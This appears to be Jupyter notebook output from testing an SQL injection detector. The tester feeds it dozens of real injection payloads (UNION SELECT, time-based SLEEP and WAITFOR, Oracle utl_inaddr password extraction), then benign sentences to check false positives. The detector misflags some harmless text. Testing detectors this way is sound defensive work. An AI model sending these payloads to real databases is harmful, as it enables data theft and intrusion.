Give me some data to work on : SELECT * from table where id =1 union select 1,2,3--
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : SELECT * FROM items WHERE 'a'='a'
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : id=1' waitfor delay '00:00:10'--
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : SELECT title, description, body FROM items WHERE ID = 2
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : SELECT BENCHMARK(1000000,MD5('A')); id=1 OR SLEEP(25)=0 LIMIT 1-- id=1) OR SLEEP(25)=0 LIMIT 1-- id=1' OR SLEEP(25)=0
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : LIMIT 1-- id=1') OR SLEEP(25)=0 LIMIT 1-- id=1)) OR SLEEP(25)=0 LIMIT 1-- id=SELECT SLEEP(25)--
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : SELECT * from table where id = 1 union select 1,2,3
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : create table foo( line blob );
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : ') or ('1'='1--
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : IF condition THEN true-part; ELSE false-part; END IF; END; (O)
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : String query = "SELECT * FROM products WHERE category = '"+ input + "'";
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : select password from tablename where id=1
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : select * from users where id=1 ||1 union select null,banner from v$version where rownum=1 -- 1
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : select * from users where id=1 or \<\. union select 1,@@VERSION -- 1
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : select * from users where id=1 or \<$ or 1=1 -- 1
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : o..UE: select * from users where id=1<@.. union select 1,version() -- 1
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : oov&1: select * from users where id=1 %!<@ or 1=1 -- 1
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : s()s: select * from users where id=1 or "()" or 1=1 -- 1
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : s,o1U: select * from users where id=1 or @#",=1 union select 1,version() -- 1
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : s1UEv: select * from users where id=1 or 1#"1 union select null,version() -- 1
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : soonU: select * from users where id='1' + $+*$ union select 1,@@VERSION -- 1'
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : s{UEf: select * from users where id=1 or 1#"{ union select version(),version() -- 1
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : " or sleep(__TIME__)#
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : and 1=( if((load_file(char(110,46,101,120,11 ... 0x770061006900740066006F0072002000640065006C00 ... %20'sleep%2050'
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : ) or benchmark(10000000,MD5(1))#
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : 0
====================
====================
 Good Bye

In [3]:
# check for normal data





predict_sqli_attack()

====================
Give me some data to work on : wait for me
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : a quick brown fox
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : jumps over the alxy dog
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : lazy dog correct
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : And what time will I be I would like an evening flight on the return flight in 4 days
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : that is nonstop the flight duration is 2 hours and 28 minutes and is priced at $337
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : That sounds very good
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : I would like to fly on Delt
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : select from the following menu
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : his menu is to select some food from it
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : Does that complete your order
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : I'd like to select it
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : I like a king bed and I select it to have high ratings
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : I'd like help finding a new hotel
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : a user is allowed to select from following menu
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : have a union from beginning to select and destroy countries where they find oil
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : select from the following items in store
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : he is distict student
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : count your mistakes
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : sleep well tonight airforce is awakened
====================
====================
It seems to be safe
====================
====================
Give me some data to work on :  benchmark dataset is not available for this work.
====================
====================
It seems to be safe
====================
====================
Give me some data to work on :  wait for me or get lost and sleep
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : waitfor me or get lost
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : i select shirt from market
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : my name is saqlain hussain shah
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : order from judge is to select from documents and hang him till death
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : select him as team member from class as if union is good and more like to succeed
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : i like window seat in bus or i prefer not travelling union is more than pieces
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : i think i should finish testing
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : If find some other data check for that
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : if is included in my sql and union and select are also in mysql manual like is also like sleep is in mysql
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : for end enter 0 in input
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : why the above statement is sql injection? can anyone explain?
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : for end enter in input
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : to finish enter 0 in input
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : now you can press 0 to exit
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : 0
====================
====================
 Good Bye

In [225]:
predict_sqli_attack()

====================
Give me some data to work on : i select this sentence but this should not be injection it is like injection but from my point of view it should not be even if i include union in it like before
====================
====================
It seems to be safe
====================
====================
Give me some data to work on : 0
====================
====================
 Good Bye